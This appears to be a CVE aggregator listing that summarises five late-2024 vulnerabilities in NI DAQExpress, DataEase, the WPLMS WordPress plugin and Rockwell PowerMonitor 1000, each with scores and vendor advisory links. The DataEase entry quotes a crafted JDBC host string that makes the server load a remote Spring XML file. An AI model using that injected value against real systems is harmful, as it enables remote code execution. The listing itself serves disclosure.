CVSS: 8.4EPSS: 0%CPEs: -EXPL: 0CVE-2024-12741 – Deserialization Of Untrusted Data Vulnerability In NI DAAQAExpress Project File
https://notcve.org/view.php?id=CVE-2024-12741
A deserialization of untrusted data vulnerability exists in NI DAQExpress that may result in remote code execution. • https://knowledge.ni.com/KnowledgeArticleDetails?id=kA00Z000000kFD7SAM&l=en-US • CWE-502: Deserialization of Untrusted Data •
CVSS: 8.6EPSS: 0%CPEs: 1EXPL: 0CVE-2024-55952 – Dataease Redshift Data Source JDBC Connection Parameters Not Verified Leads to RCE Vulnerability
https://notcve.org/view.php?id=CVE-2024-55952
DataEase is an open source business analytics tool. Authenticated users can remotely execute code through the backend JDBC connection. When constructing the jdbc connection string, the parameters are not filtered. Constructing the host as ip:5432/test/?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=http://ip:5432/1.xml&a= can trigger the ClassPathXmlApplicationContext construction method. • https://github.com/dataease/dataease/commit/0db4872a52eccf6e83dd9359aa05db52dd580ec1 https://github.com/dataease/dataease/security/advisories/GHSA-w8qm-xw38-93qw • CWE-20: Improper Input Validation •
CVSS: 8.5EPSS: 0%CPEs: -EXPL: 0CVE-2024-56051 – WordPress WPLMS plugin < 1.9.9.5 - Student+ Remote Code Execution (RCE) vulnerability
https://notcve.org/view.php?id=CVE-2024-56051
Improper Control of Generation of Code ('Code Injection') vulnerability in VibeThemes WPLMS allows Code Injection.This issue affects WPLMS: from n/a before 1.9.9.5. • https://patchstack.com/database/wordpress/plugin/wplms-plugin/vulnerability/wordpress-wplms-plugin-1-9-9-5-student-remote-code-execution-rce-vulnerability? • CWE-94: Improper Control of Generation of Code ('Code Injection') •
CVSS: 9.3EPSS: 0%CPEs: 14EXPL: 0CVE-2024-12372 – Rockwell Automation PowerMonitorâ„¢ 1000 Denial of Service
https://notcve.org/view.php?id=CVE-2024-12372
A denial-of-service and possible remote code execution vulnerability exists in the Rockwell Automation Power Monitor 1000. The vulnerability results in corruption of the heap memory which may compromise the integrity of the system, potentially allowing for remote code execution or a denial-of-service attack. • https://www.rockwellautomation.com/en-us/trust-center/security-advisories/advisory.SD1714.html • CWE-94: Improper Control of Generation of Code ('Code Injection') •
CVSS: 9.3EPSS: 0%CPEs: 14EXPL: 0CVE-2024-12371 – Rockwell Automation PowerMonitorâ„¢ 1000 Remote Code Execution
https://notcve.org/view.php?id=CVE-2024-12371
A device takeover vulnerability exists in the Rockwell Automation Power Monitor 1000. This vulnerability allows configuration of a new Policyholder user without any authentication via API. Policyholder user is the most privileged user that can perform edit operations, creating admin users and performing factory reset. • https://www.rockwellautomation.com/en-us/trust-center/security-advisories/advisory.SD1714.html • CWE-306: Missing Authentication for Critical Function •